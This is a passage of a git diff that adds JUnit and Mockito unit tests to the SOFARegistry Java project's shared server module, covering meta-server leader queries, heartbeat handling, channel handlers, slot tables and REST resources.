AbstractMetaServerManager.queryLeaderInfo(Lists.newArrayList("localhost"), client)); + + client = Mockito.mock(javax.ws.rs.client.Client.class); + WebTarget webTarget = Mockito.mock(WebTarget.class); + Mockito.when(client.target(Mockito.anyString())).thenReturn(webTarget); + Invocation.Builder builder = Mockito.mock(Invocation.Builder.class); + Mockito.when(webTarget.request()).thenReturn(builder); + Invocation invocation = Mockito.mock(Invocation.class); + Mockito.when(builder.buildGet()).thenReturn(invocation); + + Response response = Mockito.mock(Response.class); + Mockito.when(invocation.invoke()).thenReturn(response); + + Mockito.when(response.getStatus()).thenReturn(300); + Assert.assertNull( + AbstractMetaServerManager.queryLeaderInfo(Lists.newArrayList("localhost"), client)); + + Mockito.when(response.getStatus()).thenReturn(200); + GenericResponse genericResponse = new GenericResponse(); + Mockito.when(response.readEntity(GenericResponse.class)).thenReturn(genericResponse); + Assert.assertNull( + AbstractMetaServerManager.queryLeaderInfo(Lists.newArrayList("localhost"), client)); + + genericResponse.setSuccess(true); + Assert.assertNull( + AbstractMetaServerManager.queryLeaderInfo(Lists.newArrayList("localhost"), client)); + + Map m = new LinkedHashMap<>(); + m.put(AbstractMetaServerManager.EPOCH_KEY, 100L); + m.put(AbstractMetaServerManager.LEADER_KEY, ""); + genericResponse.setData(m); + + Assert.assertNull( + AbstractMetaServerManager.queryLeaderInfo(Lists.newArrayList("localhost"), client)); + + m.put(AbstractMetaServerManager.LEADER_KEY, "test-leader"); + + Assert.assertEquals( + new LeaderInfo(100, "test-leader"), + AbstractMetaServerManager.queryLeaderInfo(Lists.newArrayList("localhost"), client)); + + MockServerManager mockServerManager = new MockServerManager(); + mockServerManager.setRsClient(client); + // not refresh + Assert.assertNull(mockServerManager.metaLeaderInfo); + // leader is null, not update + mockServerManager.refresh(new BaseHeartBeatResponse(true, null, 0)); + Assert.assertNull(mockServerManager.metaLeaderInfo); + + TestUtils.assertRunException( + MetaLeaderQueryException.class, () -> mockServerManager.resetLeaderFromRestServer()); + mockServerManager.domains = Lists.newArrayList("localhost"); + String leader = mockServerManager.getMetaServerLeader(); + Assert.assertEquals("test-leader", leader); + Assert.assertNotNull(mockServerManager.metaLeaderInfo); + Assert.assertEquals("test-leader", mockServerManager.getMetaServerLeader()); + + // same leader epoch, not update + LeaderInfo leaderInfo = mockServerManager.metaLeaderInfo; + BaseHeartBeatResponse heartBeatResponse = + new BaseHeartBeatResponse(true, "leader2", mockServerManager.metaLeaderInfo.getEpoch()); + mockServerManager.refresh(heartBeatResponse); + Assert.assertEquals(leaderInfo, mockServerManager.metaLeaderInfo); + Assert.assertEquals(leaderInfo.hashCode(), mockServerManager.metaLeaderInfo.hashCode()); + + heartBeatResponse = new BaseHeartBeatResponse(true, "leader2", leaderInfo.getEpoch() + 1); + mockServerManager.refresh(heartBeatResponse); + Assert.assertEquals( + new LeaderInfo(leaderInfo.getEpoch() + 1, "leader2"), mockServerManager.metaLeaderInfo); + + // reset the rsclient + TestUtils.assertRunException(MetaLeaderQueryException.class, () -> mockServerManager.init()); + } + + @Test + public void testConnect() { + MockServerManager mgr = new MockServerManager(); + mgr.connectFailed = true; + mgr.setServerIps(Lists.newArrayList("ip1")); + TestUtils.assertRunException(RuntimeException.class, () -> mgr.connectServer()); + } + + private static final class MockServerManager extends AbstractMetaServerManager { + List domains = Collections.emptyList(); + boolean connectFailed; + + @Override + public Channel connect(URL url) { + if (connectFailed) { + throw new IllegalStateException(); + } + return null; + } + + @Override + protected Collection getConfiguredMetaServerDomains() { + return domains; + } + + @Override + public int getRpcTimeoutMillis() { + return 10000; + } + + @Override + public int getServerPort() { + return 0; + } + } +} diff --git a/server/server/shared/src/test/java/com/alipay/sofa/registry/server/shared/meta/MetaServerServiceTest.java b/server/server/shared/src/test/java/com/alipay/sofa/registry/server/shared/meta/MetaServerServiceTest.java new file mode 100644 index 000000000..24ae0d2f9 --- /dev/null +++ b/server/server/shared/src/test/java/com/alipay/sofa/registry/server/shared/meta/MetaServerServiceTest.java @@ -0,0 +1,203 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.shared.meta; + +import com.alipay.sofa.registry.common.model.GenericResponse; +import com.alipay.sofa.registry.common.model.ProcessId; +import com.alipay.sofa.registry.common.model.metaserver.ProvideData; +import com.alipay.sofa.registry.common.model.metaserver.cluster.VersionedList; +import com.alipay.sofa.registry.common.model.metaserver.inter.heartbeat.BaseHeartBeatResponse; +import com.alipay.sofa.registry.common.model.metaserver.inter.heartbeat.HeartbeatRequest; +import com.alipay.sofa.registry.common.model.metaserver.nodes.MetaNode; +import com.alipay.sofa.registry.common.model.metaserver.nodes.SessionNode; +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import com.alipay.sofa.registry.common.model.store.URL; +import com.alipay.sofa.registry.remoting.exchange.message.Response; +import com.alipay.sofa.registry.server.shared.TestUtils; +import com.alipay.sofa.registry.server.shared.env.ServerEnv; +import com.alipay.sofa.registry.util.WakeUpLoopRunnable; +import com.google.common.collect.Lists; +import com.google.common.collect.Sets; +import java.util.Collections; +import java.util.List; +import java.util.Map; +import org.junit.Assert; +import org.junit.Test; +import org.mockito.Mockito; + +public class MetaServerServiceTest { + + @Test + public void testCheckFailCounter() { + MockServerService mockServerService = new MockServerService(); + mockServerService.setMetaServerManager(Mockito.mock(MetaServerManager.class)); + Assert.assertFalse(mockServerService.checkRenewFailCounter()); + mockServerService.renewFailCounter.set(mockServerService.MAX_RENEW_FAIL_COUNT - 1); + Assert.assertFalse(mockServerService.checkRenewFailCounter()); + mockServerService.renewFailCounter.set(mockServerService.MAX_RENEW_FAIL_COUNT); + Assert.assertTrue(mockServerService.checkRenewFailCounter()); + Assert.assertEquals(mockServerService.renewFailCounter.get(), 0); + } + + @Test + public void testHandleHeartbeatResp() { + MockServerService mockServerService = new MockServerService(); + mockServerService.setMetaServerManager(Mockito.mock(MetaServerManager.class)); + + TestUtils.assertRunException( + RuntimeException.class, + () -> mockServerService.handleHeartbeatFailed("test", new IllegalArgumentException())); + Assert.assertEquals(mockServerService.renewFailCounter.getAndSet(0), 1); + + TestUtils.assertRunException( + RuntimeException.class, () -> mockServerService.handleHeartbeatResponse(null)); + Mockito.verify(mockServerService.metaServerManager, Mockito.times(0)) + .refresh(Mockito.anyObject()); + + // false and data is null + TestUtils.assertRunException( + RuntimeException.class, + () -> mockServerService.handleHeartbeatResponse(new GenericResponse<>())); + Mockito.verify(mockServerService.metaServerManager, Mockito.times(0)) + .refresh(Mockito.anyObject()); + + // not leader + GenericResponse resp = new GenericResponse<>(); + BaseHeartBeatResponse heartBeatResponse = + new BaseHeartBeatResponse( + false, VersionedList.EMPTY, null, VersionedList.EMPTY, "test", 100); + resp.setData(heartBeatResponse); + TestUtils.assertRunException( + RuntimeException.class, () -> mockServerService.handleHeartbeatResponse(resp)); + Mockito.verify(mockServerService.metaServerManager, Mockito.times(1)) + .refresh(Mockito.anyObject()); + + // is leader and false + heartBeatResponse = + new BaseHeartBeatResponse( + true, + new VersionedList(2, Lists.newArrayList(new MetaNode(new URL("192.168.1.1"), "dc1"))), + new SlotTable(10, Collections.emptyList()), + new VersionedList( + 1, + Lists.newArrayList( + new SessionNode(new URL("192.168.1.2"), "zoneA", ServerEnv.PROCESS_ID), + new SessionNode( + new URL("192.168.1.3"), "zoneB", new ProcessId("test", 1, 1, 1)))), + "test", + 100); + resp.setData(heartBeatResponse); + TestUtils.assertRunException( + RuntimeException.class, () -> mockServerService.handleHeartbeatResponse(resp)); + Mockito.verify(mockServerService.metaServerManager, Mockito.times(1)) + .refresh(Mockito.anyObject()); + + // is leader and true + mockServerService.renewFailCounter.incrementAndGet(); + resp.setSuccess(true); + mockServerService.handleHeartbeatResponse(resp); + Mockito.verify(mockServerService.metaServerManager, Mockito.times(2)) + .refresh(Mockito.anyObject()); + Assert.assertEquals(mockServerService.renewFailCounter.get(), 0); + Assert.assertEquals(1, mockServerService.getSessionServerEpoch()); + Assert.assertEquals( + mockServerService.getSessionServerList(), Sets.newHashSet("192.168.1.2", "192.168.1.3")); + Assert.assertEquals(mockServerService.getDataCenters(), Sets.newHashSet("dc1")); + Map sessionNodeMap = mockServerService.getSessionNodes(); + Assert.assertEquals(sessionNodeMap.size(), 2); + Assert.assertEquals(sessionNodeMap.keySet(), mockServerService.getSessionServerList()); + List zones = mockServerService.getSessionServerList(""); + Assert.assertEquals(zones.size(), 2); + Assert.assertTrue(zones.contains("192.168.1.2")); + Assert.assertTrue(zones.contains("192.168.1.3")); + + Assert.assertEquals(2, mockServerService.getSessionProcessIds().size()); + Assert.assertTrue(mockServerService.getSessionProcessIds().contains(ServerEnv.PROCESS_ID)); + zones = mockServerService.getSessionServerList("zoneC"); + Assert.assertEquals(zones.size(), 0); + + zones = mockServerService.getSessionServerList("zoneA"); + Assert.assertEquals(zones.size(), 1); + Assert.assertTrue(zones.contains("192.168.1.2")); + } + + @Test + public void testSuspend() { + MockServerService mockServerService = new MockServerService(); + mockServerService.setMetaServerManager(Mockito.mock(MetaServerManager.class)); + mockServerService.startRenewer(); + WakeUpLoopRunnable loop = mockServerService.renewer; + Assert.assertFalse(loop.isSuspended()); + mockServerService.suspendRenewer(); + Assert.assertTrue(loop.isSuspended()); + mockServerService.resumeRenewer(); + Assert.assertFalse(loop.isSuspended()); + } + + @Test + public void testFetchData() { + MockServerService mockServerService = new MockServerService(); + mockServerService.setMetaServerManager(Mockito.mock(MetaServerManager.class)); + TestUtils.assertRunException( + RuntimeException.class, () -> mockServerService.fetchData("testDataId")); + Response response = + new Response() { + @Override + public Object getResult() { + return null; + } + }; + Mockito.when(mockServerService.metaServerManager.sendRequest(Mockito.anyObject())) + .thenReturn(response); + TestUtils.assertRunException( + RuntimeException.class, () -> mockServerService.fetchData("testDataId")); + final ProvideData provideData = new ProvideData(null, "testDataId", 10L); + response = + new Response() { + @Override + public Object getResult() { + return provideData; + } + }; + Mockito.when(mockServerService.metaServerManager.sendRequest(Mockito.anyObject())) + .thenReturn(response); + ProvideData got = mockServerService.fetchData("testDataId"); + Assert.assertEquals(provideData, got); + } + + private static final class MockServerService + extends AbstractMetaServerService { + + @Override + public int getRenewIntervalSecs() { + return 10000; + } + + @Override + protected void handleRenewResult(BaseHeartBeatResponse result) {} + + @Override + protected HeartbeatRequest createRequest() { + return null; + } + + @Override + protected long getCurrentSlotTableEpoch() { + return 0; + } + } +} diff --git a/server/server/shared/src/test/java/com/alipay/sofa/registry/server/shared/meta/MetaTest.java b/server/server/shared/src/test/java/com/alipay/sofa/registry/server/shared/meta/MetaTest.java new file mode 100644 index 000000000..97587c088 --- /dev/null +++ b/server/server/shared/src/test/java/com/alipay/sofa/registry/server/shared/meta/MetaTest.java @@ -0,0 +1,80 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.shared.meta; + +import com.alipay.sofa.registry.common.model.GenericResponse; +import com.alipay.sofa.registry.common.model.elector.LeaderInfo; +import com.alipay.sofa.registry.remoting.jersey.JerseyClient; +import com.google.common.collect.Lists; +import java.util.Collections; +import java.util.LinkedHashMap; +import java.util.Map; +import javax.ws.rs.client.Invocation; +import javax.ws.rs.client.WebTarget; +import javax.ws.rs.core.Response; +import org.junit.Assert; +import org.junit.Test; +import org.mockito.Mockito; + +public class MetaTest { + @Test + public void test() { + javax.ws.rs.client.Client client = JerseyClient.getInstance().getClient(); + Assert.assertNull(AbstractMetaServerManager.queryLeaderInfo(Collections.EMPTY_LIST, client)); + Assert.assertNull( + AbstractMetaServerManager.queryLeaderInfo(Lists.newArrayList("localhost"), client)); + + client = Mockito.mock(javax.ws.rs.client.Client.class); + WebTarget webTarget = Mockito.mock(WebTarget.class); + Mockito.when(client.target(Mockito.anyString())).thenReturn(webTarget); + Invocation.Builder builder = Mockito.mock(Invocation.Builder.class); + Mockito.when(webTarget.request()).thenReturn(builder); + Invocation invocation = Mockito.mock(Invocation.class); + Mockito.when(builder.buildGet()).thenReturn(invocation); + + Response response = Mockito.mock(Response.class); + Mockito.when(invocation.invoke()).thenReturn(response); + + Mockito.when(response.getStatus()).thenReturn(300); + Assert.assertNull( + AbstractMetaServerManager.queryLeaderInfo(Lists.newArrayList("localhost"), client)); + + Mockito.when(response.getStatus()).thenReturn(200); + GenericResponse genericResponse = new GenericResponse(); + Mockito.when(response.readEntity(GenericResponse.class)).thenReturn(genericResponse); + Assert.assertNull( + AbstractMetaServerManager.queryLeaderInfo(Lists.newArrayList("localhost"), client)); + + genericResponse.setSuccess(true); + Assert.assertNull( + AbstractMetaServerManager.queryLeaderInfo(Lists.newArrayList("localhost"), client)); + + Map m = new LinkedHashMap<>(); + m.put(AbstractMetaServerManager.EPOCH_KEY, 100L); + m.put(AbstractMetaServerManager.LEADER_KEY, ""); + genericResponse.setData(m); + + Assert.assertNull( + AbstractMetaServerManager.queryLeaderInfo(Lists.newArrayList("localhost"), client)); + + m.put(AbstractMetaServerManager.LEADER_KEY, "test-leader"); + + Assert.assertEquals( + new LeaderInfo(100, "test-leader"), + AbstractMetaServerManager.queryLeaderInfo(Lists.newArrayList("localhost"), client)); + } +} diff --git a/server/server/shared/src/test/java/com/alipay/sofa/registry/server/shared/remoting/ChannelHandlerTest.java b/server/server/shared/src/test/java/com/alipay/sofa/registry/server/shared/remoting/ChannelHandlerTest.java new file mode 100644 index 000000000..e97c43263 --- /dev/null +++ b/server/server/shared/src/test/java/com/alipay/sofa/registry/server/shared/remoting/ChannelHandlerTest.java @@ -0,0 +1,64 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.shared.remoting; + +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.remoting.Channel; +import com.alipay.sofa.registry.server.shared.TestUtils; +import org.junit.Test; + +public class ChannelHandlerTest { + private static final Logger LOGGER = LoggerFactory.getLogger(ChannelHandlerTest.class); + + @Test + public void test() { + MockHandler handler = new MockHandler(LOGGER, LOGGER); + handler.connected(null); + handler.disconnected(null); + handler.caught(null, null, null); + TestUtils.assertRunException( + UnsupportedOperationException.class, () -> handler.received(null, null)); + + TestUtils.assertRunException(IllegalStateException.class, () -> handler.doHandle(null, null)); + + TestUtils.assertRunException(RuntimeException.class, () -> handler.buildFailedResponse(null)); + } + + private static class MockHandler extends AbstractChannelHandler { + + MockHandler(Logger connectLog, Logger exchangeLog) { + super(connectLog, exchangeLog); + } + + @Override + protected Node.NodeType getConnectNodeType() { + return Node.NodeType.CLIENT; + } + + @Override + public Object doHandle(Channel channel, Object request) { + throw new IllegalStateException(); + } + + @Override + public Class interest() { + return MockHandler.class; + } + } +} diff --git a/server/server/shared/src/test/java/com/alipay/sofa/registry/server/shared/remoting/ListenServerChannelHandlerTest.java b/server/server/shared/src/test/java/com/alipay/sofa/registry/server/shared/remoting/ListenServerChannelHandlerTest.java new file mode 100644 index 000000000..07820551c --- /dev/null +++ b/server/server/shared/src/test/java/com/alipay/sofa/registry/server/shared/remoting/ListenServerChannelHandlerTest.java @@ -0,0 +1,42 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.shared.remoting; + +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.remoting.ChannelHandler; +import com.alipay.sofa.registry.server.shared.TestUtils; +import org.junit.Assert; +import org.junit.Test; + +public class ListenServerChannelHandlerTest { + @Test + public void test() { + ListenServerChannelHandler handler = + new ListenServerChannelHandler() { + @Override + protected Node.NodeType getConnectNodeType() { + return Node.NodeType.CLIENT; + } + }; + Assert.assertEquals(ChannelHandler.HandlerType.LISTENER, handler.getType()); + Assert.assertNull(handler.interest()); + TestUtils.assertRunException( + UnsupportedOperationException.class, () -> handler.doHandle(null, null)); + + TestUtils.assertRunException(RuntimeException.class, () -> handler.buildFailedResponse(null)); + } +} diff --git a/server/server/shared/src/test/java/com/alipay/sofa/registry/server/shared/remoting/SlotTableChangeEventHandlerTest.java b/server/server/shared/src/test/java/com/alipay/sofa/registry/server/shared/remoting/SlotTableChangeEventHandlerTest.java new file mode 100644 index 000000000..aa25bd598 --- /dev/null +++ b/server/server/shared/src/test/java/com/alipay/sofa/registry/server/shared/remoting/SlotTableChangeEventHandlerTest.java @@ -0,0 +1,75 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.shared.remoting; + +import static org.mockito.Matchers.anyObject; +import static org.mockito.Mockito.mock; +import static org.mockito.Mockito.when; + +import com.alipay.sofa.registry.common.model.CommonResponse; +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.common.model.metaserver.SlotTableChangeEvent; +import com.alipay.sofa.registry.remoting.ChannelHandler; +import com.alipay.sofa.registry.server.shared.TestUtils; +import com.alipay.sofa.registry.server.shared.meta.MetaServerService; +import org.junit.Assert; +import org.junit.Test; + +public class SlotTableChangeEventHandlerTest { + @Test + public void testCheckParam() { + SlotTableChangeEventHandler handler = newHandler(); + TestUtils.assertRunException( + IllegalArgumentException.class, + () -> { + handler.checkParam(null); + }); + + TestUtils.assertRunException( + IllegalArgumentException.class, + () -> { + handler.checkParam(new SlotTableChangeEvent(0)); + }); + handler.checkParam(new SlotTableChangeEvent(10)); + } + + private SlotTableChangeEventHandler newHandler() { + SlotTableChangeEventHandler handler = new SlotTableChangeEventHandler(); + Assert.assertNull(handler.getExecutor()); + Assert.assertEquals(handler.interest(), SlotTableChangeEvent.class); + Assert.assertEquals(handler.getConnectNodeType(), Node.NodeType.META); + Assert.assertEquals(handler.getType(), ChannelHandler.HandlerType.PROCESSER); + Assert.assertEquals(handler.getInvokeType(), ChannelHandler.InvokeType.SYNC); + CommonResponse failed = (CommonResponse) handler.buildFailedResponse("msg"); + Assert.assertFalse(failed.isSuccess()); + return handler; + } + + @Test + public void testHandle() { + SlotTableChangeEventHandler handler = newHandler(); + MetaServerService svc = mock(MetaServerService.class); + handler.metaServerService = svc; + when(svc.handleSlotTableChange(anyObject())).thenReturn(false); + CommonResponse response = (CommonResponse) handler.doHandle(null, new SlotTableChangeEvent(10)); + Assert.assertFalse(response.isSuccess()); + + when(svc.handleSlotTableChange(anyObject())).thenReturn(true); + response = (CommonResponse) handler.doHandle(null, new SlotTableChangeEvent(10)); + Assert.assertTrue(response.isSuccess()); + } +} diff --git a/server/server/shared/src/test/java/com/alipay/sofa/registry/server/shared/resource/MetricsResourceTest.java b/server/server/shared/src/test/java/com/alipay/sofa/registry/server/shared/resource/MetricsResourceTest.java new file mode 100644 index 000000000..9a0f62238 --- /dev/null +++ b/server/server/shared/src/test/java/com/alipay/sofa/registry/server/shared/resource/MetricsResourceTest.java @@ -0,0 +1,30 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.shared.resource; + +import javax.ws.rs.core.Response; +import org.junit.Assert; +import org.junit.Test; + +public class MetricsResourceTest { + @Test + public void test() { + MetricsResource resource = new MetricsResource(); + Response response = resource.metrics(); + Assert.assertEquals(response.getStatus(), 200); + } +} diff --git a/server/server/shared/src/test/java/com/alipay/sofa/registry/server/shared/resource/RegistryOpsResourceTest.java b/server/server/shared/src/test/java/com/alipay/sofa/registry/server/shared/resource/RegistryOpsResourceTest.java new file mode 100644 index 000000000..29f145ba0 --- /dev/null +++ b/server/server/shared/src/test/java/com/alipay/sofa/registry/server/shared/resource/RegistryOpsResourceTest.java @@ -0,0 +1,52 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.shared.resource; + +import com.alipay.sofa.registry.common.model.CommonResponse; +import com.alipay.sofa.registry.server.shared.meta.MetaServerService; +import org.junit.Assert; +import org.junit.Test; +import org.mockito.Mockito; + +public class RegistryOpsResourceTest { + @Test + public void test() { + MetaServerService metaServerService = Mockito.mock(MetaServerService.class); + RegistryOpsResource resource = new RegistryOpsResource(); + + resource.metaServerService = metaServerService; + CommonResponse response = resource.kickOffMyself(); + Assert.assertTrue(response.isSuccess()); + Mockito.verify(metaServerService, Mockito.times(1)).suspendRenewer(); + Mockito.verify(metaServerService, Mockito.times(1)).addSelfToMetaBlacklist(); + + response = resource.putMyselfBack(); + Assert.assertTrue(response.isSuccess()); + Mockito.verify(metaServerService, Mockito.times(1)).resumeRenewer(); + Mockito.verify(metaServerService, Mockito.times(1)).removeSelfFromMetaBlacklist(); + } + + @Test + public void testException() { + RegistryOpsResource resource = new RegistryOpsResource(); + // npe + CommonResponse response = resource.kickOffMyself(); + Assert.assertFalse(response.isSuccess()); + response = resource.putMyselfBack(); + Assert.assertFalse(response.isSuccess()); + } +} diff --git a/server/server/shared/src/test/java/com/alipay/sofa/registry/server/shared/resource/SlotGenericResourceTest.java b/server/server/shared/src/test/java/com/alipay/sofa/registry/server/shared/resource/SlotGenericResourceTest.java new file mode 100644 index 000000000..4407fd640 --- /dev/null +++ b/server/server/shared/src/test/java/com/alipay/sofa/registry/server/shared/resource/SlotGenericResourceTest.java @@ -0,0 +1,44 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.shared.resource; + +import com.alipay.sofa.registry.common.model.GenericResponse; +import com.alipay.sofa.registry.common.model.slot.Slot; +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import com.google.common.collect.Sets; +import java.util.Collections; +import java.util.Set; +import org.junit.Assert; +import org.junit.Test; + +public class SlotGenericResourceTest { + @Test + public void test() { + SlotGenericResource resource = new SlotGenericResource(); + Set slots = Sets.newHashSet(new Slot(1, "text", 2, Collections.emptyList())); + SlotTable slotTable = new SlotTable(10, slots); + resource.record(slotTable); + + GenericResponse response = resource.slotTable(); + Assert.assertTrue(response.isSuccess()); + Assert.assertEquals(response.getData(), slotTable); + + GenericResponse epochResp = resource.epoch(); + Assert.assertTrue(response.isSuccess()); + Assert.assertEquals(epochResp.getData().longValue(), 10); + } +} diff --git a/server/server/shared/src/test/java/com/alipay/sofa/registry/server/shared/slot/SlotTableUtilsTest.java b/server/server/shared/src/test/java/com/alipay/sofa/registry/server/shared/slot/SlotTableUtilsTest.java new file mode 100644 index 000000000..4a7a89f51 --- /dev/null +++ b/server/server/shared/src/test/java/com/alipay/sofa/registry/server/shared/slot/SlotTableUtilsTest.java @@ -0,0 +1,39 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.shared.slot; + +import com.alipay.sofa.registry.common.model.slot.Slot; +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import com.google.common.collect.Lists; +import java.util.Collections; +import org.junit.Assert; +import org.junit.Test; + +public class SlotTableUtilsTest { + @Test + public void test() { + SlotTable slotTable = + new SlotTable(10, Lists.newArrayList(new Slot(1, null, 0, Collections.emptyList()))); + Assert.assertFalse(SlotTableUtils.checkNoLeaderEmpty(slotTable)); + Assert.assertFalse(SlotTableUtils.isValidSlotTable(slotTable)); + + slotTable = + new SlotTable(10, Lists.newArrayList(new Slot(1, "test", 0, Lists.newArrayList("test")))); + Assert.assertFalse(SlotTableUtils.checkNoDupLeaderAndFollowers(slotTable)); + Assert.assertFalse(SlotTableUtils.isValidSlotTable(slotTable)); + } +} diff --git a/server/server/shared/src/test/java/com/alipay/sofa/registry/server/shared/util/DatumUtilsTest.java b/server/server/shared/src/test/java/com/alipay/sofa/registry/server/shared/util/DatumUtilsTest.java new file mode 100644 index 000000000..bc3106bd4 --- /dev/null +++ b/server/server/shared/src/test/java/com/alipay/sofa/registry/server/shared/util/DatumUtilsTest.java @@ -0,0 +1,94 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.shared.util; + +import com.alipay.sofa.registry.common.model.PublishSource; +import com.alipay.sofa.registry.common.model.constants.ValueConstants; +import com.alipay.sofa.registry.common.model.dataserver.Datum; +import com.alipay.sofa.registry.common.model.dataserver.DatumVersion; +import com.alipay.sofa.registry.common.model.store.Publisher; +import com.alipay.sofa.registry.common.model.store.SubDatum; +import com.alipay.sofa.registry.common.model.store.Subscriber; +import java.util.Collections; +import java.util.Map; +import org.junit.Assert; +import org.junit.Test; + +/** + * @author xuanbei + * @since 2019/2/12 + */ +public class DatumUtilsTest { + @Test + public void testNewEmptySubDatum() { + Subscriber subscriber = new Subscriber(); + subscriber.setDataId("subscriber-dataId"); + subscriber.setGroup("DEFAULT_GROUP"); + subscriber.setInstanceId("InstanceId"); + subscriber.setDataInfoId("dataInfoId"); + SubDatum subDatum = DatumUtils.newEmptySubDatum(subscriber, "testDc"); + Assert.assertEquals(subDatum.getDataCenter(), "testDc"); + Assert.assertEquals(subDatum.getDataInfoId(), subscriber.getDataInfoId()); + Assert.assertEquals(subDatum.getDataId(), subscriber.getDataId()); + Assert.assertEquals(subDatum.getInstanceId(), subscriber.getInstanceId()); + 